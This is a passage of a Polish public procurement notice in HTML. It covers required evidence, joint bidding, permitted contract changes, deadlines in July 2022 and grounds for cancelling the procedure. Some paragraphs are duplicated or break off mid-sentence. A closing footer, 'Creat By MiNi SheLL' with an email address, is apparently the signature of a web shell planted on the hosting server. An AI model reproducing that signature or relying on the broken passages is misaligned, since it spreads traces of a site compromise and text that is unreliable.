dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli wykonawca nie złoży powyższych przedmiotowych środków dowodowych lub złożone środki dowodowe będą<br/>niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienie w wyznaczonym terminie.<br/>Zamawiający nie będzie wzywał wykonawców do złożenia lub uzupełnienia przedmiotowych środków dowodowych , jeżeli<br/>pomimo ich złożenia oferta wykonawcy podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykaz oświadczeń i dokumentów jakie Wykonawca musi dołączyć do oferty:<br/>a) wypełniony formularz oferty – wg zał. nr 1 do SWZ (wzór),<br/>b) wypełniony formularz cenowy – wg zał. nr 2 do SWZ (wzór),<br/>c) oświadczenie Wykonawcy o niepodleganiu wykluczeniu – wg zał. nr 5 do SWZ (wzór),<br/>d) pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały<br/>wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej – jeśli dotyczy,<br/>e) pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się<br/>o zamówienie tzw. „konsorcja” oraz spółek cywilnych) – jeśli dotyczy,<br/>f) przedmiotowe środki dowodowe o jakich mowa w Rozdziale III pkt 4 SWZ.<br/>2. Zamawiający żąda załączenia przez Wykonawcę do oferty przedmiotowych środków dowodowych.<br/>3. Wykaz oświadczeń i dokumentów jakie Wykonawca musi przedłożyć na wezwanie Zamawiającego.<br/>Zamawiający przed udzieleniem zamówienia, wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie – nie krótszym niż 5 dni od dnia wezwania - aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych wymienionych poniżej:<br/>a) Oświadczenie o aktualności informacji zawartych w oświadczeniu<br/>o niepodleganiu wykluczeniu (wzór) – wg zał. nr 6 do SWZ,<br/>4. Oświadczenia i dokumenty o których mowa w pkt. 1 w rozdziale IV SWZ należy składać w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym a następnie zaszyfrować wraz z plikami<br/>stanowiącymi ofertę. W przypadku składania oświadczeń i dokumentów w formie elektronicznej należy je podpisać<br/>kwalifikowanym podpisem elektronicznym zgodnie z zapisami w pkt. 1 lit, c) i d) w części VIII SWZ.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 Pzp, dane umożliwiające dostęp do tych środków. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. W toku prowadzonego<br/>postępowaniakomunikacja pomiędzy zamawiającym a wykonawcami wspólnie ubiegającymisię<br/>o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika), o którym<br/>mowa w pkt. 1 w rozdziale V SWZ. 3. Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zawarte są w rozdziale V<br/>SWZ.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.2. W<br/>toku prowadzonego postępowania komunikacja pomiędzy zamawiającym a wykonawcami<br/>wspólnie ubiegającymi się o udzielenie zamówienia następować będzie za pośrednictwem lidera<br/>(pełnomocnika) o którym mowa w pkt. 1 w rozdziale V SWZ.3. W przypadku wspólnego<br/>ubiegania się o zamówienie przez wykonawców, każdy z wykonawców wraz z ofertą składa<br/>oświadczenie o niepodleganiu wykluczeniu wg zał. nr 5 do SWZ (wzór).4. Spółka cywilna, jest<br/>kwalifikowana jako wykonawcy wspólnie ubiegający się o udzielenie zamówienia dlatego jej<br/>wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo<br/>reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do<br/>oferty. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest do złożenia wraz z ofertą oświadczenia o<br/>niepodleganiu wykluczeniu wg zał. nr 5 do SWZ (wzór).5. Wszyscy wykonawcy<br/>składający wspólną ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy i<br/>wniesienie zabezpieczenia należytego wykonania umowy. Zamawiający może w ramach<br/>odpowiedzialności solidarnej żądać wykonania umowy od wszystkich wykonawców łącznie lub<br/>od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonywania zmian w treści niniejszej umowy w sytuacjach, gdy wystąpi co najmniej<br/>jedna z poniżej wymienionych okoliczności:<br/>1) zachodzi konieczność zmiany terminu wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego<br/>przewidzieć w chwili podpisania umowy i nie wynika z przyczyn zawinionych przez Wykonawcę;<br/>2) gdy z przyczyn niezawinionych przez Wykonawcę nie jest możliwe dostarczenie wskazanych w ofercie artykułów,<br/>Zamawiający dopuszcza ich zmianę na artykuły nie gorsze niż zaoferowane;<br/>3) doszło do wydłużenia okresu gwarancyjnego przez producenta;<br/>4) niezbędna jest zmiana sposobu wykonania zobowiązania z przyczyn niezawinionych przez Wykonawcę, o ile zmiana taka<br/>jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowego wykonania umowy;<br/>5) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>zamówienia;<br/>6) możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia;<br/>7) nastąpi zmiana danych wykonawcy np. zmiana adresu, osób kontaktowych itp.<br/>8) w przypadku uznania sprzętu za niekwalifikowalny. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-20 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) nie złożono żadnej oferty;<br/>2) wszystkie złożone oferty podlegały odrzuceniu;<br/>3) cena lub koszt najkorzystniejszej oferty lub oferta z najniższą ceną przewyższa kwotę, którą<br/>zamawiający zamierza przeznaczyć na sfinansowanie zamówienia, chyba że zamawiający może<br/>zwiększyć tę kwotę do ceny lub kosztu najkorzystniejszej oferty;<br/>4) w przypadkach, o których mowa w art. 248 ust. 3, art. 249 i art. 250 ust. 2, zostały złożone<br/>oferty dodatkowe o takiej samej cenie lub koszcie;<br/>5) wystąpiła istotna zmiana okoliczności powodująca, że prowadzenie postępowania lub<br/>wykonanie zamówienia nie leży w interesie publicznym, czego nie można było wcześniej<br/>przewidzieć;<br/>6) postępowanie obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie<br/>niepodlegającej unieważnieniu umowy w sprawie zamówienia publicznego;<br/>7) wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy lub uchylił<br/>się od zawarcia umowy w sprawie zamówienia publicznego, z uwzględnieniem art. 263;<br/>2. Zamawiający może unieważnić postępowanie o udzielenie zamówienia odpowiednio przed<br/>upływem terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed<br/>upływem terminu składania ofert, jeżeli wystąpiły okoliczności powodujące, że dalsze<br/>prowadzenie postępowania jest nieuzasadnione.<br/>3. Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki<br/>publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części<br/>zamówienia, nie zostały mu przyznane.<br/>4. Zamawiający informuje niezwłocznie wszystkich wykonawców o:zamieszkania, jeżeli jest miejscem wykonywania<br/>działalności wykonawcy, którego ofertę<br/>wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca zamieszkania, jeżeli są<br/>miejscami wykonywania działalności wykonawców, którzy złożyli oferty, a także punktację<br/>przyznaną ofertom w każdym kryterium oceny ofert i łączną punktację,<br/>2) wykonawcach, których oferty zostały odrzucone- podając uzasadnienie faktyczne i prawne.<br/>3) Zamawiający udostępnia niezwłocznie informacje, o których mowa w pkt 1 powyżej, na<br/>stronie internetowej prowadzonego postępowania.<br/>5. Do obowiązków Wykonawcy należy ustalenie dokładnego terminu dostawy i prac w Szkole z<br/>Zamawiającym, w taki sposób aby nie kolidowały z prowadzonymi zajęciami.<br/>6. Informacje dotyczące walut obcych, w jakich mogą być prowadzone rozliczenia między<br/>zamawiającym a wykonawcą, jeżeli zamawiający przewiduje rozliczenia w walutach obcych:<br/>Zamawiający nie przewiduje rozliczeń w walutach obcych. Rozliczenia pomiędzy zamawiającym<br/>a wykonawcą realizowane będą w złotych polskich PLN.<br/>7. Zamawiający dopuszcza zmiany postanowień zawartej umowy zgodnie z przesłankami<br/>określonymi we wzorze umowy - załącznik nr 4 do SWZ.<br/>8. Wymagania w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2<br/>Nie dotyczy.<br/>9. Informacja o zastrzeżeniu możliwości ubiegania się o udzielenie zamówienia wyłącznie przez<br/>wykonawców, o których mowa w art. 94 Pzp<br/>Nie dotyczy.<br/>10. Wymóg lub możliwość złożenia oferty w postaci katalogów elektronicznych lub dołączenie<br/>katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 Pzp<br/>Nie dotyczy.<br/>11. Wysokość zwrotu kosztów udziału w postępowaniu, jeżeli zamawiający przewiduje ich zwrot:<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu, z zastrzeżeniem art. 261<br/>Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com